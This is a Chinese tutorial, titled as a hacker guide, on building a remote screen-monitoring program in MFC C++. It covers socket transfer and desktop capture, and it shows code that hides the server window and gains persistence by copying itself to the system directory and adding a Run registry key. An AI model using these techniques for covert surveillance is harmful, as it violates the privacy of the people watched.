对别人计算机屏幕监视黑客教程Word文档格式.docx
《对别人计算机屏幕监视黑客教程Word文档格式.docx》由会员分享,可在线阅读,更多相关《对别人计算机屏幕监视黑客教程Word文档格式.docx(6页珍藏版)》请在冰豆网上搜索。
超级间谍"
、"
冰河"
等,但由于其带有黑软的性质,不能保证其在编程时没有留有其他后门,因此从计算机安全的角度出发应当自行开发此类软件。
为避免本文所述技术被用于制造黑客类软件,本文将不准备对远程终端的控制部分做进一步的介绍,而将重点放在对远程计算机屏幕界面的监视上。
1数据信息在网络上的传送
由于本地计算机是通过网络来对远程计算机实施监控,因此需要对网卡进行编程以实现往来于双方的数据信息在网络上的顺畅通讯。
可供选择的方案有套接字、邮槽、命名管道等多种,本文在此选用开发和应用都比较灵活的流式套接字作为网络通讯的基础。
考虑到实际情况,远程被监视主机随时为本地监控主机提供屏幕信息的服务,因此整个系统可以划分为两大模块--服务器端和客户机端,分别运行于远程主机和本地监控主机,由客户机向服务器发出连接请求,在建立连接后由服务器定时发送远程屏幕信息给客户机,客户机接收到服务器发来的数据后将其显示在本地主机。
至于用流式套接字对网络进行编程的主要过程可用下图来表示。
服务器方在使用套接字之前,首先必须拥有一个Socket,可用socket()函数创建之:
sock=socket(AF_INET,SOCK_STREAM,0);
其中AF_INET和SOCK_STREAM指定了创建的是采用了TCP/IP地址族的流式套接字。
该套接字实际上是提供了一个通信端口,通过这个端口可与任何一个具有套接字端口的计算机实施通信。
一旦获取了新的套接字,应立即通过bind()将该套接字与本机上的一个端口建立关联。
需要预先对一个指向包含有本机IP地址和端口信息的sockaddr_in结构填充一些必要的信息,如本地端口号和本地主机地址等,并通过bind()将服务器进程在网络上标识出来:
sockin_s.sin_family=AF_INET;
sockin_s.sin_addr.s_addr=0;
sockin_s.sin_port=htons(PORT);
bind(sock,(LPSOCKADDR)&
sockin_s,sizeof(sockin_s));
在完成接下来的listen()侦听后,需要用accept()等待接收客户端的连接,由于该函数在没有客户端进行申请连接之前会处于阻塞状态,因此需要为其单独开辟一个线程,以免影响到程序整体:
AfxBeginThread(Server,NULL);
//创建一个新的线程
……
UINTServer(LPVOIDlpVoid)
{
CSurveillant_ServerView*pView=((CSurveillant_ServerView*)((CFrameWnd*)
AfxGetApp()->
m_pMainWnd)->
GetActiveView());
intnLen=sizeof(SOCKADDR);
pView->
newskt_s=accept(pView->
sock,(LPSOCKADDR)&
pView->
sockin_s,(LPINT)&
nLen);
WSAAsyncSelect(pView->
newskt_s,pView->
m_hWnd,WM_MSG,FD_CLOSE);
SetTimer(0,2500,NULL);
return1;
}
在这里通过WSAAsyncSelect()异步选择函数来以异步的形式响应关心的网络事件FD_CLOSE,并在该事件发生时发出自定义WM_MSG消息,通过响应这个消息可以得之当前与服务器联系的客户机程序已关闭退出,由于服务器部分是运行于远程工程现场的,为了使控制中心的监控程序(客户)在下次发出监控请求时能为其提供服务需要在WM_MSG的消息响应函数里关闭由accept()所产生的新的套接字newskt_s,并重新启动该线程等待监控程序的再次连接。
在accept()函数成功返回后,就可以在定时器响应函数里用send()函数与之建立了连接的监控主机定时发送捕获的远程屏幕信息了。
作为客户的监控程序,其实现过程要比服务器简单许多。
由于需要接收数据,因此在异步选择函数中需要设定待监测的网络事件为FD_CLOSE和FD_READ。
在消息响应函数中可以通过对消息参数的低位字节进行判断而区分出具体发生是何种网络事件,并对其做出响应的反应。
下面是监控端程序网络部分的主要代码:
IPaddr=inet_addr(strIP);
//创建套接字
sockin_c.sin_family=AF_INET;
sockin_c.sin_addr.S_un.S_addr=IPaddr;
sockin_c.sin_port=m_Port;
connect(sock,(LPSOCKADDR)&
sockin_c,sizeof(sockin_c));
//连接服务器
WSAAsyncSelect(sock,m_hWnd,WM_MSG,FD_READ|FD_CLOSE);
通过异步选择函数的设定,在有数据到达时会由FD_READ触发WM_MSG消息,并在处理函数中通过调用recv()将远程主机的屏幕信息从网络接收到缓存,并完成在本地机的重显。
通过以上几步,已经初步具备了在远程服务器和本地客户机之间的网络通讯能力,可以完成屏幕信息的网络传送任务。
对远程计算机屏幕的捕捉和显示
前面部分的工作只是为整个监控系统提供一个低层的网络数据通讯的能力,也可以说是为现场主机和监控中心提供一个通信用信道。
至于本文的中心议题--远程监视工作则需要分别在现场主机和监控中心中完成对屏幕的捕捉和信息的再现。
屏幕的捕捉可以采取先获取桌面窗口指针并建立一个与之兼容的设备环境,然后创建一个与桌面窗口指针相兼容的内存位图并以位图的形式将屏幕图像拷贝到新创建的位图之中:
chardot[1572864];
//1024*768*2
CBitmapbmp;
//内存位图
CDCwdc;
//设备环境
CDC*pDC;
//指向桌面窗口的设备环境指针
staticCWindowDCddc(GetDesktopWindow());
//引用桌面窗口指针定义对象ddc
pDC=&
ddc;
//将指针pdc指向ddc
wdc.CreateCompatibleDC(pDC);
//建立与ddc兼容的设备环境
bmp.CreateCompatibleBitmap(pDC,1024,768);
//建立与ddc兼容的位图
wdc.SelectObject(&
bmp);
//选择bmp
wdc.BitBlt(0,0,1024,768,pDC,0,0,SRCCOPY);
//把桌面图像复制到wdc的bmp中
这时虽以获取到了屏幕的信息,并将其复制到内存位图之中,但此时还不能直接将其发送出去,需要调用CBitmap类的成员函数GetBitmapBits()来将图像信息从内存位图拷贝到缓存,并通过套接字的send()函数将缓存中存放的屏幕信息通过网络从现场主机发送到控制中心。
现场主机的屏幕信息在控制中心的再现,基本上是屏幕截取的逆过程:
先建立一个同客户区相关的设备环境并建立一个与之兼容的设备环境,然后按位图格式在内存中创建一个与之兼容的内存位图。
在从网络接收完一屏信息后,通过CBitmap的成员函数SetBitmapBits()把缓存中的屏幕信息按位图格式拷贝到内存位图,最后完成对内存位图的显示。
其主要过程如下:
CDC*pDC=GetDC();
//引用用户窗口指针定义对象pDC
//建立与pDC兼容的devicecontext
//建立与pDC兼容的位图
iReadLen=recv(sock,buffer,60000,0);
//从网络接收数据
for(i=0;
i<
iReadLen;
i++)
dot[pointer]=buffer[i];
pointer++;
if(pointer==1572864)//判断接收到的信息是否已满一屏
{
GetClientRect(&
rect);
bmp.SetBitmapBits(1572864,(LPVOID)dot);
//把内存数据复制到bmp中
//把bmp中图像复制到用户窗口中
pDC->
StretchBlt(0,0,rect.Width(),rect.Height(),&
wdc,0,0,1024,768,SRCCOPY);
pointer=0;
//接收完一屏后指针复位,准备接收下一屏
}
服务程序的自动加载及扩展
从功能上看,服务端程序只负责为远程客户提供服务,在全部运行期间根本不需要人为的外来干预,因此可以隐藏其界面并将其作成后台服务程序:
BOOLCMainFrame:
:
PreCreateWindow(CREATESTRUCT&
cs)
……
cs.cx=200;
cs.cy=10;
cs.style=WS_POPUP;
cs.dwExStyle|=WS_EX_TOOLWINDOW;
returnTRUE;
另外,由于现在计算机多具有通过Modem实现远程唤醒的功能,因此如能使服务程序具备自启动功能将实现远程现场主机的无人值守。
自启动有多种方式:
在Autoexec.bat、win.ini等文件中加入启动命令、在"
启动"
菜单里加入指向程序的快捷方式、修改注册表等。
其中由于注册表通常被人为改动的机会要小的多,因此通过修改注册表实现自启动是一种比较安全的方法。
本文采取的方法是:
先通过API函数CopyFile()将服务程序复制到系统目录,然后对HKEY_LOCAL_MACHINE的Software\Microsoft\Windows\CurrentVersion\Run写入一个字符串键值,该键值的内容是服务程序在系统目录下的全路径:
DWORDtype=REG_SZ;
DWORDsize=MAX_PATH;
LPCTSTRRgspath="
Software\\Microsoft\\Windows\\CurrentVersion\\Run"
;
GetSystemDirectory(SysPath,size);
//获取系统目录
GetModuleFileName(NULL,CurrentPath,size);
//获取程序路径
FileCurrentName=CurrentPath;
FileNewName=lstrcat(SysPath,"
\\Surveillant.exe"
);
ret=CopyFile(FileCurrentName,FileNewName,TRUE);
//拷贝程序到系统目录
//打开注册表
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE,&
hKEY);
//写入注册表
ret=RegSetValueEx(hKEY,"
Surveillant"
NULL,type,FileNewName,size);
//关闭注册表
RegCloseKey(hKEY);
至于监控中心对现场主机的远程控制,则主要是通过向对方程序发送用以标识消息的数据并在远程主机接收完毕后用SendMessage()向指定窗口发送消息来完成的,可用CreateProcess();
来启动现场主机的程序以响应消息。
由于该部分技术亦可用来编写黑客软件,故本文在此不便作进一步的描述。
小结:
本文主要针对基于流式套接字的低层网络通讯模块和建立在该模块基础之上的屏幕截取和复原技术的设计、实现作了较为详细的介绍。
本文所述监控系统在实际应用中取得了较好的效果。
使工程技术人员能在控制中心及时了解到位于工程现场的计算机屏幕上的指示图表的动态显示,并根据监视结果作出及时的决策。
本文所述程序在Windows2000Professional下,由MicrosoftVisualC++编译通过。
升级会员 